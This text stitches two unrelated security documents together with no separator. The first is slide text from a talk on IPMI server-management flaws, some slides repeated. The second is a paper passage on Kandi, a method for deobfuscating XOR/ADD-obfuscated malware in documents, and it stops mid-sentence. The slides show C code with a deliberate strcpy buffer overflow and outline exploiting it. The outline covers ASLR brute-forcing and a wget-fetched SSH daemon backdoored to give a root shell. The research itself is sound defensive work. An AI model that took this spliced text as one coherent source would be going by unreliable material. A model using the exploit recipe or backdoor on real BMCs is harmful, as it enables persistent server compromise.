  char name[128], pwd[24]; 
  char *temp ; 
  // ... initialize ...
  temp = cgiGetVariable("name"); 
  strcpy(name, temp); 
  temp = cgiGetVariable("pwd"); 
  strcpy(pwd, temp); 
  // ... authenticate user ...
}
Server backend: 
   ... CGI programs. 
   ... written in C. 
   ... running as root. 
Buffer Overflows 
// login.cgi 
int main(void) 
{
  char name[128], pwd[24]; 
  char *temp ; 
  // ... initialize ...
  temp = cgiGetVariable("name"); 
  strcpy(name, temp); 
  temp = cgiGetVariable("pwd"); 
  strcpy(pwd, temp); 
  // ... authenticate user ...
}
Buffer Overflows 
No length validation? 

Buffer Overflows 
No length validation? 

Buffer Overflows 
No length validation? 

Buffer-overflow defenses? 
Buffer Overflow Exploitability 
No DEP (Stack and Heap are executable). 
No Stack Canaries. 
Limited ASLR. 
(Stack/Heap base addresses are randomized, but 
 dynamic libraries are not.  Return-to-libc works.) 
Stack is randomized (ASLR). 
...but, only 12 bits are random.  Just 4096 possibilities. 
Exploitation Challenges 
We gain control on the return from main(). 
Stack is small: shellcode must be compact. 
BMC crashes and reboots if pounded too hard with requests. 
Buffer Overflow Exploit 
Solutions 
Store the shell command in the name  buffer. 
Brute force through the stack randomization. 
Limit the time between brute-force iterations. 
Avg. search time: ~7 min. 
Payload 
Fetch (wget) and install modified SSH daemon. 
Forks root shell on incorrect  password. 
Only 2 instructions changed! 
root@localhost # 
Vulnerable Models? 
Cursory check of all Supermicro IPMI firmware 
downloads as of May 23, 2013. 
30 of 64 images appear vulnerable. 
135 device models. 
Supermicro says they’re working on a fix. 
Possibly affects other ATEN-based products. 
So, rooting this device is easy !
But, what are the implications? 
Yet another broken embedded system? 
The Impact 
Only as secure  as our weakest component. 
Entire system is now vulnerable! 
Adding an entire computer only weakens. 
The Impact 
BMC-based spyware and botnets 
Rooted BMC → Rooted host system 
       Mount a custom OS and reboot. 
Rooted host system → Rooted BMC 
        Re-flash the BMC with malicious code. 
BMC rootkits 
        A backdoor that survives potentially forever. 
A scary thought 
IPMI meets Matrix  → Is your IPMI just emulated? How do you know? 
IPMI for Evil 
Scanned all public IPs on May 7, 2013 using ZMap*.
Downloaded all X.509 certs from HTTPS servers. 
Used identifying characteristics of default certificates.†
Network Measurements 
*  ZMap: Fast Internet-wide Scanning and its Security Applications .
    Paper and tool coming this FRIDAY at Usenix Security. 
† Details on “identifying characteristics” may be found in our  paper 
Could root 
all these in 
parallel in 
minutes! 
For System Operators 
Never  attach your IPMI device directly to the Internet. 
    Use an isolated management network or VLAN. 
Change default passwords and certificates. 
Disable IPMI if you don’t need it. 
Unfortunately: we’re at the will of the Vendor Defenses 
For IPMI Vendors 
These are textbook vulns.  You have to do better. 
Apply security engineering practices. 
Sign and verify firmware when flashing. 
Make devices hard to deploy on public IPs. Defenses 
Lessons 
A Culture Clash? 
Embedded Internet 
IPMI: hopefully a climax 
Analysis of other vendors’ implementations 
Dell, HP, Lenovo, Oracle, etc. 
Firmware update exploitation 
Can an attacker inject a backdoor that persists? 
Across BMC reboot?  Across BMC flashes?  Forever? 
IPMI honeypot 
Unclear whether attackers are exploiting these devices in the wild. 
Some anecdotal evidence of their use as spambots. 
Are they being used for other malicious purposes? 
Future Work 
IPMI serves a vital role for system management. 
Carries elevated risks, potential for powerful attacks. 
At least some vendors are getting it badly wrong. 
Farmer is correct: IPMI is a serious concern. 
Our work: A call to arms . 
Conclusions 
Illuminating the Security Issues with 
Lights-Out Server Management 
Anthony J. Bonkoski        J. Alex Halderman 
abonkosk@umich.edu          jhalderm@umich.edu 
University of Michigan 

Zmap Scan Details 
Vendor Identifying Characteristics 
SuperMicro Subjects containing “linda.wu@supermicro.com” or “doris@aten.com.tw” 
Dell Subject containing iDRAC 
HP Subjects containing “CN=ILO” and issuers containing “iLO3 Default Issuer” 
or “Hewlett Packard” 
*Landing pages spot-checked for false positives Deobfuscating Embedded Malware using
Probable-Plaintext Attacks
Christian Wressnegger1,2, Frank Boldewin3, and Konrad Rieck2
1idalab GmbH, Germany
2University of G ̈ ottingen, Germany
3www.reconstructer.org
Abstract. Malware embedded in documents is regularly used as part
of targeted attacks. To hinder a detection by anti-virus scanners, the
embedded code is usually obfuscated, often with simple Vigen` ere ci-
phers based on XOR, ADD and additional ROL instructions. While for
short keys these ciphers can be easily cracked, breaking obfuscations with
longer keys requires manually reverse engineering the code or dynami-
cally analyzing the documents in a sandbox. In this paper, we present
Kandi , a method capable of efficiently decrypting embedded malware
obfuscated using Vigen` ere ciphers. To this end, our method performs a
probable-plaintext attack from classic cryptography using strings likely
contained in malware binaries, such as header signatures, library names
and code fragments. We demonstrate the efficacy of this approach in dif-
ferent experiments. In a controlled setting, Kandi breaks obfuscations
using XOR, ADD and ROL instructions with keys up to 13 bytes in less
than a second per file. On a collection of real-world malware in Word,
Powerpoint and RTF files, Kandi is able to expose obfuscated malware
from every fourth document without involved parsing.
Keywords: embedded malware, obfuscation, cryptanalysis
1 Introduction
Documents containing malware have become a popular instrument for targeted
attacks. To infiltrate a target system, malicious code is embedded in a benign
document and transfered to the victim, where it can—once opened—unnoticeably
infiltrate the system. Two factors render this strategy attractive for attackers:
First, it is relatively easy to lure even security-aware users into opening an un-
trusted document. Second, the complexity of popular document formats, such
as Word and PDF, constantly gives rise to zero-day vulnerabilities in the respec-
tive applications, which provide the basis for unnoticed execution of malicious
code. Consequently, embedded malware has been used as part of several targeted
attack campaigns, such as Taidoor [28], Duqu [1] and MiniDuke [6].
To hinder a detection by common anti-virus scanners, malicious code em-
bedded in document files is usually obfuscated, often in multiple layers with
increasing complexity. Although there exist a wide range of possible obfuscation
2 Deobfuscating Embedded Malware using Probable-Plaintext Attacks
strategies, many attackers resort to simple cryptographic ciphers when imple-
menting the first obfuscation layer in native code. Often these ciphers are vari-
ants of the so-called Vigen` ere cipher using XOR and ADD/SUB instructions for
substitution and ROL/ROR for transposition. The resulting code can fit into
less than 100 bytes and, in contrast to strong ciphers, exposes almost no de-
tectable patterns in the documents [see 4]. As an example, Figure 1 shows a
simple deobfuscation loop using XOR that fits into 28 bytes.
Due to the simplicity and small size, such native code seems sufficient for
a first obfuscation layer, yet the resulting encryption is far from being crypto-
graphically strong. For short keys up to 2 bytes the obfuscation can be trivially
broken using brute-force attacks. However, uncovering malware obfuscated with
longer keys, as for example the 4-byte key in Figure 1, still necessitates manually
reverse engineering the code or dynamically analyzing the malicious document
in a sandbox with vulnerable versions of the target application [e.g., 7, 17, 20].
While both approaches are effective in removing the obfuscation layer, they re-
quire a considerable amount of time in practice and are thus not suitable for
analyzing and detecting embedded malware at end hosts.
In this paper, we present Kandi , a method capable of efficiently breaking
Vigen` ere-based obfuscations and automatically uncovering embedded malware
in documents without the need to parse the document’s file format. The method
leverages concepts from classic cryptography in order to conduct a probable-
plaintext attack against common variants of the Vigen` ere cipher. To this end,
the method first approximates the length of possible keys and then computes
so-called difference streams of the document and plaintexts likely contained in
malware binaries. These plaintexts are automatically retrieved beforehand and
may include fragments of the PE header, library names and common code stubs.
Using these streams it is possible to look for the plaintexts directly in the ob-
fuscated data. If sufficient matches are identified, Kandi automatically derives
the obfuscation key and reveals the full embedded code for further analysis, for
example, by an anti-virus scanner or a human expert.
We demonstrate the efficacy of this approach in an empirical evaluation with
documents of different formats and real malware. In a controlled experiment
Kandi is able to break obfuscations using XOR and ADD/SUB with keys up
to 13 bytes. On a collection of real-world malware in Word, Powerpoint and
RTF documents with unknown obfuscation, Kandi is able to deobfuscate every
fourth document and exposes the contained malware binary, including several
00: be XX XX XX XX mov edx, ADDRESS
05: 31 db xor ebx, ebx
07: 81 34 1e XX XX XX XX start: xor dword [edx + ebx], KEY
0e: 81 c3 04 00 00 00 add ebx, 0x04
14: 81 fb XX XX XX XX cmp ebx, LENGTH
1a: 7c eb jl start
Fig. 1. Example of native code for a Vigen` ere-based obfuscation. The code snippet
deobfuscates data at ADDRESS of length LENGTH using the 4-byte key KEY. For simplicity
we omit common tricks to avoid null bytes in the code.
Deobfuscating Embedded Malware using Probable-Plaintext Attacks 3
samples of the recent attack campaign MiniDuke [6]. Moreover, Kandi is sig-
nificantly faster than dynamic approaches and enables scanning documents and
deobfuscating malware at a throughput rate of 16.46 Mbit/s, corresponding to
5 documents of∼400 kB per second.
It is necessary to note that Kandi targets only one of many possible obfus-
cation strategies. If a different form of obfuscation is used or no plaintexts are
known in advance, the method obviously cannot uncover obfuscated data. We
discuss these limitations in Section 5 specifically. Nonetheless, Kandi defeats a
prevalent form of obfuscation in practice and thereby provides a valuable ex-
tension to current methods for the analysis of targeted attacks and embedded
malware in the wild.
The rest of this paper is organized as follows: Obfuscation using Vigen` ere
ciphers and classic cryptanalysis are reviewed in Section 2. Our method Kandi
is introduced in Section 3 and an empirical evaluation of its capabilities is pre-
sented in Section 4. We discuss limitations and related work in Section 5 and 6,
respectively. Section 7 concludes the paper.
2 Obfuscation and Cryptanalysis
The obfuscation of code can be achieved using various techniques, ranging from
simple encodings to strong ciphers and emulator-based packing. Implementations
of complex techniques, however, often contain characteristic patterns and thus
increase the risk of detection by anti-virus scanners [4]. As a consequence, simple
encodings and weak ciphers are still widely used for obfuscation despite their
shortcomings. In the following section we investigate a specific type of such
basic obfuscation, which is frequently used to hide malware in documents.
2.1 Vigen` ere-based Obfuscation
The substitution of bytes using XOR and ADD/SUB—a variant of so-called
Vigen` ere ciphers [19]—is one of the simplest yet widely used obfuscation tech-
niques. These ciphers are regularly applied for cloaking shellcodes and embedded
malware. Figure 1 and 2 show examples of these ciphers in x86 code.
start: mov al, byte [edx]
add al, ADD_KEY
rol al, ROL_KEY
mov byte [edx], al
inc edx
cmp edx, LENGTH
jl start
(a) Obfuscation using ADD and ROLstart: mov al, byte [PTR + ebx]
sub byte [edx], al
inc ebx
and ebx, 0x0f
inc edx
cmp edx, LENGTH
jl start
(b) Obfuscation with 16-byte key
Fig. 2. Code snippets for Vigen` ere-based obfuscation: (a) Data stored at [edx] is
obfuscated using ADD and ROL, (b) Data stored at [edx] is obfuscated using SUB
with the 16-byte key at PTR.
4 Deobfuscating Embedded Malware using Probable-Plaintext Attacks
Due to the implementation with only a few instructions, Vigen` ere-based ob-
fuscation keeps a small footprint in the code, thereby complicating the task of
extracting reliable signatures for anti-virus scanners. Additionally, this obfusca-
tion is fast, easily understandable and good enough to seemingly protect mali-
cious code in the first layer of obfuscation. Despite these advantages Vigen` ere
ciphers suffer from several well-known weaknesses.
Definition of Vigen` ere Ciphers. Before presenting attacks against Vigen` ere-
based obfuscation, we first need to introduce some notation and define the family
of Vigen` ere ciphers studied in this work. We consider the original code of a mal-
ware binary as a sequence of nbytesM1...M nand similarly represent the re-
sulting obfuscated data by C1...C n. When referring to cryptographic concepts,
we sometimes denote the original code as plaintext and refer to the obfuscated
data as ciphertext. The Vigen` ere-based obfuscation is controlled using a key
K1...K loflbytes, where lusually is much smaller than n. Moreover, we use
ˆKi=K(imodl)to access the individual bytes of the key.
Using this notation, we can define a family of Vigen` ere ciphers, where each
byteMiis encrypted with the key byte ˆKiusing the binary operation ◦and
decrypted using its inverse operation ◦−1, as follows:
Ci=Mi◦ˆKiandMi=Ci◦−1ˆKi.
This simple definition covers several variants of the Vigen` ere cipher, as im-
plementations only differ in the choice of the two operations ◦and◦−1. For
example, if we define ◦as addition and◦−1as subtraction, we obtain the classic
form of the Vigen` ere cipher. Table 1 lists binary operations that are frequently
used for obfuscating malicious code. Note that a subtraction can be expressed
as an addition with a negative element and thus is handled likewise.
Table 1. Operators of Vigen` ere ciphers used for obfuscation.
Operation Encryption ◦ Decryption ◦−1
Addition (ADD) ( X+Y) mod 256 ( X−Y) mod 256
Subtraction (SUB) ( X−Y) mod 256 ( X+Y) mod 256
Exclusive-Or (XOR) X⊕Y X ⊕Y
Theoretically, any pair of operations that is inverse to each other can be
used to construct a Vigen` ere cipher. In practice, most implementations build
on logic and arithmetic functions that induce a commutative group over bytes.
That is, the operation ◦is commutative and associative as well as there exists an
identity element and inverse elements providing the operation ◦−1. These group
properties are crucial for different types of efficient attacks as we will see in
Sections 2.2 and 2.4. Note that ROL and ROR instructions are not commutative
and thus are treated differently in the implementation of our method Kandi
presented in Section 3.
Deobfuscating Embedded Malware using Probable-Plaintext Attacks 5
Another important observation is that some bytes are encrypted with the
same part of the key. In particular, this holds true for every pair of bytes Mi
andMjwhose distance is a multiple of the key length, that is, i≡j(modl).
This repetition of the key is a critical weakness of Vigen` ere ciphers and can be
exploited to launch further attacks that we discuss in Sections 2.3 and 2.4.
With these few basic definitions in mind, we can pursue three fundamentally
different approaches for attacking Vigen` ere ciphers: (1) brute-force attacks and
heuristics , (2) ciphertext-only attacks and (3) probable-plaintext attacks . In the
following, we discuss each of these attack types in detail and check whether they
are applicable for deobfuscating embedded malware.
2.2 Brute-force Attacks and Heuristics
A straightforward way of approaching malware obfuscations is to brute-force
the key used by the malware author. There are two basic implementations for
such an attack: First, one encrypts all plaintext patterns that are assumed to
be present in the original binary with each and every key and tries to match
those. Second, one decrypts the binary or parts of it and looks for the presence
of the plaintext as a usual signature engine would do. In both cases a valid key
is derived if a certain amount of plaintexts match. For short keys, this approach
is both fast and effective. In practice, brute-force attacks prove to be a valuable
tool for analyzing malware obfuscated using keys up to 2 bytes [3, 26].
Theoretically, an exhaustive search over the complete key space can be used
to also derive keys with more than 2 bytes. However, this obviously comes at
the price of runtime performance. For a key length of only 4 bytes there are
more than 4.2 billion combinations that need to be checked in the worst case.
This clearly exceeds the limits of what is possible in the scope of the deobfusca-
tion of embedded malware. Even worse, 4-byte and 8-byte keys fit the registers of
common CPU architectures and therefore, do not require much different deobfus-
cation routines. In fact, the underlying logic is identical to the use of single-byte
keys and the code size is only marginally larger as illustrated in Figure 1.
A more clever way of approaching the problem is by relying on the structure
of embedded malware binaries, which are often PE files. In this format \x00bytes
are used as padding for sections and headers which gives rise to a heuristic. We
recall from Section 2.1 that the binary operation ◦has an identity element,
which simply is 0 for XOR as well as ADD instructions. Therefore, whenever
a large block of \x00bytes is encrypted, the key is revealed multiple times
and can be read off without extra effort. Hence, once a highly repetitive string is
spotted in obfuscated data, deobfuscation is a simple task for a malware analyst.
According to our tests the very same technique is leveraged in a proprietary
system for the analysis of malware called Cryptam [16]. While effective in many
cases when a full binary including padding is obfuscated, this heuristic fails when
a malware does not encrypt \x00bytes. Furthermore, such an approach cannot
differ between variants of Vigen` ere ciphers. Since XOR and ADD have the same
identity element, there is no way to decide which one was used for obfuscation
in this setting.
6 Deobfuscating Embedded Malware using Probable-Plaintext Attacks
2.3 Ciphertext-Only Attacks
A more advanced type of classic attacks against Vigen` ere ciphers only makes
use of the ciphertext. Some of these attacks can be useful for determining the
length of the obfuscation key, whereas others even enable recovering the key if
certain conditions hold true in practice.
Index of Coincidence. A classic approach for determining the key length
from ciphertext only is the index of coincidence , commonly denoted as κ[9, 10].
Roughly speaking it represents the ratio of how many bytes happen to appear
at the same positions if you shift data against itself. Formally, the index of
coincidence is defined as
κ=∑256
i=1fi(fi−1)
n(n−1),
wherefiare the byte frequencies in data of nbytes. Under the condition that
we know the index of some plaintext κpwe are able to infer the key length lof
the Vigen` ere cipher. It is estimated as the ratio of the differences of κpto the
index of random data κrand the ciphertext κc:
l≈κp−κr
κc−κr.
The Kasiski Examination. Another ciphertext-only attack for determining
the key length is the so-called Kasiski examination [12]. The underlying as-
sumption of this method is that the original plaintext contains some identical
substrings. Usually these patterns would be destroyed by the key; however, if two
instances of such substrings are encrypted with the same portion of the key, the
encrypted data contains a pair of identical substrings as well. This implies that
the distance between the characters of these substrings is a multiple of the key
length. Thus, by gathering identical substrings in the ciphertext, it is possible
to support an assumption about the key length.
Key Recovery using Frequency Analysis. Natural languages tend to have a
very characteristic frequency distribution of letters. For instance, in the English
language the letter eis with more than 12% the significantly most frequent
letter in the alphabet [14]. Only topped by the space character, which is used in
written texts in order to separate words.
This frequency distribution can be exploited to derive the key used for the
encryption. As one can easily imagine, the actual frequency distribution does
not change by simply replacing one character with another as in the case of a
key of length l= 1. The larger the key length gets, the more the distribution is
flattened out because identical letters may be translated differently depending
on their position in the text. However, since it is possible to determine the length
of the key beforehand, one can perform the very same frequency analysis on all
characters that were encrypted with the same single-byte key ˆKi.
Deobfuscating Embedded Malware using Probable-Plaintext Attacks 7
Byte Value0.000.050.100.150.20FrequencyEnglish
(a) Distribution of English text
Byte Value0.000.050.100.150.20 FrequencyWindows PE (b) Distribution of PE files
Fig. 3. The byte frequency distributions of English text and Windows PE files.
Although effective in decrypting natural language text, key recovery using
frequency analysis is not suitable for deobfuscating embedded malware. If the
obfuscated code corresponds to regular PE files, the byte frequencies are almost
equally distributed and can hardly be discriminated, because executable code,
header information and other types of data are mixed in this format. As an
example, Figure 3 shows the byte frequency distributions of English text and PE
files, where except for a peak at \x00the distribution of PE files is basically flat.
The presented ciphertext-only attacks thus only provide means for determining
the key length of Vigen` ere-based obfuscation, but without further refinements
are not appropriate for actually recovering the key.
2.4 Probable-Plaintext Attacks
To effectively determine the key used in a Vigen` ere-based obfuscation, we con-
sider classic attacks based on known and probable plaintexts. We refer to these
attacks as probable-plaintext attacks , as we cannot guarantee that a certain plain-
text is indeed contained in an obfuscated malware binary.
Key Elimination. In particular, we consider the well-known technique of key
elimination . The idea of this technique is to determine a relation between the
plaintext and ciphertext that does not involve the key: Namely, the difference
of bytes that are encrypted with the same part of the key. Formally, for a key
byte ˆKithis difference can be expressed using the inverse operation ◦−1as:
Ci◦−1Ci+l= (Mi◦ˆKi)◦−1(Mi+l◦ˆKi) =Mi◦−1Mi+l.
Note that this relation of differences only applies if the operator used for the Vi-
gen` ere cipher induces a commutative group. For example, if we plug in the pop-
ular instructions XOR and ADD from Table 1, the difference of the obfuscated
bytesCiandCi+lallows to reason about the difference of the corresponding
plaintext bytes:
Ci⊕Ci+l= (Mi⊕ˆKi)⊕(Mi+l⊕ˆKi) =Mi⊕Mi+l
Ci−Ci+l= (Mi+ˆKi)−(Mi+l+ˆKi) =Mi−Mi+l.
Based on this observation, we can implement an efficient probable-plaintext
attack against Vigen` ere ciphers. Given a plaintext P=P1...P m, we introduce
8 Deobfuscating Embedded Malware using Probable-Plaintext Attacks
thedifference streams ∆Pand∆C. If the difference streams match at a specific
position and the plaintext Pis sufficiently large, we have successfully determined
the occurrence of a plaintext in the obfuscated data. In particular, we compute
the difference stream
∆P= (P1◦−1P1+l)...(Pm−l◦−1Pm)
for the plaintext Pand compare it against each position iof the ciphertext C
using the corresponding stream
∆C= (Ci◦−1Ci+l)...(Ci+m−l◦−1Ci+m).
Using this technique, we can efficiently search for probable plaintexts in data
obfuscated using a Vigen` ere cipher without knowing the key. This enables us to
check for common strings in the obfuscated code, such as header information,
API functions and code stubs. Once the position of a probable plaintext is found
it is possible to derive the used key by applying the appropriate inverse operation:
Kj=Ci+j◦−1Pi+jwithibeing the position where the difference stream of a
probable plaintext matches. The more plaintexts match in the obfuscated code,
the more reliably the key can finally be determined.
3 Deobfuscating Embedded Malware
After describing attacks against Vigen` ere ciphers, we now present our method
Kandi that combines and extends these attacks for deobfuscating embedded
malware. The three basic analysis steps of Kandi are described in the following
sections and outlined in Figure 4. First, our method extracts probable plaintexts
from a representative set of code (Section 3.1). Applied to an unknown document,
it then attempts to estimate the key length (Section 3.2) and finally break any
Vigen` ere-based obfuscation if present in the file (Section 3.3).
CodeCodeCodeCodeABCAAABCABCBCBCDOCZXYDOCSSProbable plaintextsKeyKey lengthGaps between recurring substringsFrequent substringsPlaintexts(a) (b) (c) 
Fig. 4. Schematic depiction of Kandi and its analysis steps: (a) Extraction of plain-
texts, (b) derivation of the key length and (c) probable-plaintext attack.
In particular, we are using the Kasiski examination for determining the
key length in step (b) and the technique of key elimination against XOR and
ADD/SUB substitutions in step (c). Additionally, we are testing each possible
transposition for ROL/ROR instructions. We consider this a legit compromise
since there exists only a few combinations to check.
Deobfuscating Embedded Malware using Probable-Plaintext Attacks 9
3.1 Extraction of Plaintexts
The deobfuscation performance of Kandi critically depends on a representative
set of probable plaintexts. In the scope of this work, we focus on Windows PE
files, as these are frequently used as initial step of an attack based on infected
documents. However, our method is not restricted to this particular type of data
and can also be applied to other representations of code from which probable
plaintexts can be easily extracted, such as DEX files and ELF objects.
In the first step, we thus extract the most common binary strings found in
PE files distributed with off-the-shelf Windows XP and Windows 7 installations.
Profitable plaintexts are, for instance, the DOS stub and its text, API strings,
library names or code patterns such as push-call sequences. To determine these
strings efficiently, we process the collected PE files using a suffix array and
extract all binary strings that appear in more than 50% of the files. Additionally,
we filter the plaintexts according to the following constraints:
– Plaintext length. In order to ensure an expressive set of probable plaintext,
we require that each plaintext is at least 4 bytes long.
– Zero bytes. As described in Section 2.2, a disadvantage of common heuris-
tics is that they are not able to deal with malware that does not obfuscate
\x00 byte regions. In order not to suffer from the very same drawback, we
completely exclude \x00 bytes and reject plaintexts containing them.
– Byte repetitions. We also exclude plaintexts that contain more than four
repetitions of a single byte. These might negatively influence the key elimi-
nation as described in Section 2.4.
We are well aware and acknowledge that there exist more sophisticated ways
to extract probable plaintexts. This for instance is day-to-day business of the
anti-virus industry when generating signatures for their detection engines. Also,
well-known entrypoint stubs as well as patterns from specific compilers, packers
and protectors might represent valuable probable plaintexts.
3.2 Deriving the Key Length
In the second step, Kandi uses the Kasiski examination (Section 2.3) to inspect
the raw bytes of a document—without any further parsing or processing of the
file. The big advantage of this method over the index of coincidence proposed by
Friedman [9] is that we neither need to rely on the byte distribution of the original
binary nor do we have to precisely locate the embedded malware. Furthermore,
the Kasiski examination allows us to take multiple candidates of the key length
into consideration. Depending on the amount of identical substrings that suggest
a particular key length, we construct a ranking of candidates for later analysis.
That way, it is possible to compensate for and recover from misinterpretations.
However, finding pairs of identical substrings in large amounts of data needs
careful algorithm engineering in order to work efficiently. We again make use
of suffix arrays for determining identical substrings in linear time in the length
10 Deobfuscating Embedded Malware using Probable-Plaintext Attacks
of the analyzed document. Since the Kasiski examination only states that the
distances between identical substrings in the ciphertext refer to multiples of
the key length, it is necessary to also examine the integer factorization thereof.
Fortunately, there exists a shortcut to this factorization step that works very well
in practice: If Kandi returns a key that repeats itself, e.g. 13 37 13 37 , this
indicates that we correctly derived the key but under an imprecise assumption
of the key length ( l= 4 rather than 2). In such cases we simply collapse the
repeating key and correct the key length accordingly.
3.3 Breaking the Obfuscation
Equipped with an expressive set of probable plaintexts and an estimation of the
key length, it is now possible to mount a probable-plaintext attack against Vi-
gen` ere-based obfuscation. The central element of this step is the key elimination
introduced in Section 2.4. It enables us to look for probable plaintexts within the
obfuscated data and derive the used key automatically. Again, Kandi directly
operates on the raw bytes of a document and thereby avoids parsing the file.
Robust Key Recovery. If a probable plaintext is longer than the estimated
key length, the overlapping bytes can be used to reinforce our assumption about
the key. To this end, we define the overlap ratio rthat is used to specify how
certain we want to be about a key candidate. The larger ris, the stricter Kandi
operates and the more reliable is the key. If we set r= 0.0, a usual match of
plaintexts is enough to support the evidence of a key candidate. This means
that we will end up with a larger amount of possibly less reliable hints. Our
experiments show that for the grand total incorrect guesses will average out and
in many cases it is possible to reliably deobfuscate embedded malware.
If a more certain decision is desired the overlap ratio rcan be increased.
However, for larger values of rwe require longer probable plaintexts: r= 0.0
only requires a minimal overlap, r= 0.5 already half of the probable plaintext’s
length and r= 1.0 twice the size. As an example, if the estimated key length is 4
andr= 0.5, only plaintexts of at least 6 bytes are used for the attack. Depending
on the approach chosen to gather probable plaintexts, it might happen that
the length of the available plaintexts ends up being the limiting factor for the
deobfuscation. We will evaluate this in the next section.
Incorporating ROL and ROR. Finally, in order to increase the effectiveness
ofKandi , we additionally consider transpositions using ROL and ROR instruc-
tions. ROL and ROR are each others inverse function, that is, when iterating
over all possible shift offsets they generate exactly the same output but in differ-
ent order. Furthermore, in most implementations these instructions operate on
8 bits only such that the combined overall number of transpositions to be tested
is very small. Consequently, we simply add a ROL shift as a preprocessing step
toKandi . Although we attempt to improve over a plain brute-force approach
for breaking obfuscation, we consider the 7 additional tests as a perfectly legit
tradeoff from a pragmatic point of view.
Deobfuscating Embedded Malware using Probable-Plaintext Attacks 11
We are also well aware that it is possible to render our method less effective
by making use of chaining or adding other computational elements that are not
defined in the scope of Vigen` ere ciphers and therefore out of reach for Kandi . We
discuss this limitation in Section 5. Nevertheless, our evaluation shows that we
are able to deobfuscate a good deal of embedded malware in the wild, including
recent samples of targeted attack campaigns, such as MiniDuke [6]. Thereby,
Kandi proves to be of great value for day-to-day business in malware analysis.
4 Evaluation
We proceed to evaluate the deobfuscation capabilities and runtime performance
ofKandi empirically. Since it is hard to determine whether embedded malware
in the wild is actually using Vigen` ere-based obfuscation or not, we start off with
a series of controlled experiments (Section 4.1). We then continue to evaluate
Kandi on real-world malware in Word, Powerpoint and RTF documents as well
as different image formats (Section 4.2). We need to stress that this collection
contains malware with unknown obfuscation. Nonetheless, Kandi is able to ex-
pose obfuscated malware in every fourth file, thereby empirically proving that
(a) Vigen` ere ciphers are indeed used in the wild and (b) that our method is able
to reliably reveal the malicious payload in these cases.
4.1 Controlled Experiments
To begin with, we evaluate Kandi in a controlled setting with known ground
truth, where we are able to exactly tell if a deobfuscation attempt was suc-
cessful or not. In particular, we conduct two experiments: First, we obfuscate
plain Windows PE files and apply Kandi to them. In the course of that, we
measure the runtime performance and throughput of our approach. Second, the
obfuscated PE files are embedded in benign Word documents in order to show
thatKandi not only works on completely encrypted data, but is also capable of
deobfuscating files embedded inside of documents.
Evaluation Datasets. In order to create a representative set of PE files for the
controlled experiments, we simply gather all PE files in the system directories
of Windows XP SP3 ( system and system32 ) and Windows 7 ( System32 and
SysWOW64 ). This includes stand-alone executables as well as libraries and drivers
and yields a total of 4,780 files. We randomly obfuscate each of the PE files with
a Vigen` ere cipher using either XOR, ADD or SUB. We draw random keys for
this obfuscation and vary the key length from 1 to 32 bytes, such that we finally
obtain 152,960 (32 ×4,780) unique obfuscated PE files.
To study the deobfuscation of embedded code, we additionally retrieve one
unique and malware-free Word document for each PE file from VirusTotal and
use it as host for the embedding. Malware appearing in the wild would be em-
bedded at positions compliant with the host’s file format. This theoretically
provides valuable information where to look for embedded malware. As Kandi
12 Deobfuscating Embedded Malware using Probable-Plaintext Attacks
does not rely on parsing the host file, we simply inject the obfuscated PE files
at random positions. We end up with a total of 152,960 unique Word documents
each containing an obfuscated PE file.
0 5 10 15 20 25 30
Key length020406080100 Deobfuscation rate in percent
Kandi (r = 0.0)
(a) Obfuscated PE files
0 2 4 6 8 10 12
Key length405060708090100 Deobfuscation rate in percentr = 0.0
r = 0.5
r = 1.0 (b) Influence of the overlap ratio
Fig. 5. Deobfuscation performance of Kandi on obfuscated PE files. Figure (b) shows
the performance for different overlap ratios.
Deobfuscation of Obfuscated PE Files. To demonstrate the capability of
our method to break Vigen` ere-based obfuscations, we first apply Kandi to the
152,960 obfuscated PE files. The probable plaintexts for this experiment are
retrieved as described in Section 3.1 without further refinements. Figure 5(a)
shows results for this experiment, where the key length is plotted against the
rate of deobfuscated PE files. For key lengths up to 13 bytes, the obfuscation can
be reliably broken with a success rate of 93% and more. This nicely illustrates
the potential of Kandi to automatically deobfuscate malware. We also observe
that the performance for keys longer than 13 bytes drops. While our approach
is not capped to a specific key length, the limiting factor at this point is the
collection of plaintexts and in particular the length of those.
To study the impact of the plaintext length, we additionally apply Kandi
with different values for the overlap ratio ras introduced in Section 3.3. The
corresponding deobfuscation rates are visualized in Figure 5(b). Although a high
value ofrpotentially increases the performance, it also reduces the number
of plaintexts that can be used. If there are too few usable plaintexts, it gets
difficult to estimate the correct key. As a result, Kandi attains a deobfuscation
performance of almost 100% for r= 1.0 if the keys are short, but is not able to
reliably break obfuscations with longer keys.
Runtime Performance. We additionally examine the runtime performance of
Kandi . For this purpose, we randomly draw 1,000 samples from the obfuscated
PE files for each key length and repeat the previous experiment single-threaded
on an Intel Core i7-2600K CPU at 3.40GHz running Ubuntu 12.04. As baseline
for this experiment, we implement a generic brute-force attack that is applied to
Deobfuscating Embedded Malware using Probable-Plaintext Attacks 13
0 5 10 15 20 25 30
Key length10-310-210-1100101102Runtime in seconds64.3 seconds Brute-force
Kandi (r = 0.0)
Kandi (r = 1.0)
(a) Average runtime per file
0 5 10 15 20 25 30
Key length05101520253035 Throughput in Mb/sBrute-force
Kandi (r= 0.0)
Kandi (r= 1.0) (b) Average throughput
Fig. 6. Runtime performance of Kandi in comparison to a brute-force attack on a
batch of 1,000 randomly drawn obfuscated PE files.
the first 256 bytes of each file. Due to the defined starting point and the typical
header structure of PE files 256 bytes are already sufficient to reliably break the
obfuscation in this setting. Note that this would not be necessarily the case for
embedded malware.
The results of this experiment are shown in Figure 6 where the runtime and
throughput of each approach are shown on the y-axis and the key length on the
x-axis. Obviously, the brute-force attack is only tractable for keys of at most 3
bytes. By contrast, the runtime of Kandi does not depend on the key length and
the method attains a throughput of 16.46 Mbit/s on average, corresponding to an
analysis speed of 5 files of ∼400 kB per second. Consequently, Kandi ’s runtime
is not only superior to brute-force attacks but also significantly below dynamic
approaches like OmniUnpack [17] or PolyUnpack [18] and thus beneficial for
analyzing embedded malware at large scales.
Deobfuscation of Injected PE Files. As last controlled experiment, we study
the deobfuscation performance of Kandi when being operated on obfuscated PE
files that have been injected into Word documents. Figure 7(a) shows the results
of this experiment. For keys with up to 8 bytes, our method deobfuscates most of
the injected PE files—without requiring the document to be parsed. Moreover,
we again inspect the influence of the overlap ratio rin this setting. Similar to
the previous experiment, a larger value of rproves beneficial for short keys, such
that keys up to 8 bytes are broken with a success rate of 81% and more. This
influence of the overlap ratio gets evident for keys between 4 and 8 bytes as
illustrated Figure7(b). For keys of length l= 8 a high value of reven doubles
the deobfuscation performance in comparsion to the default setting.
Due to this, we use an overlap ratio of r= 1.0 for the following experiments on
real-world malware. We expect embedded malware found in the wild to mainly
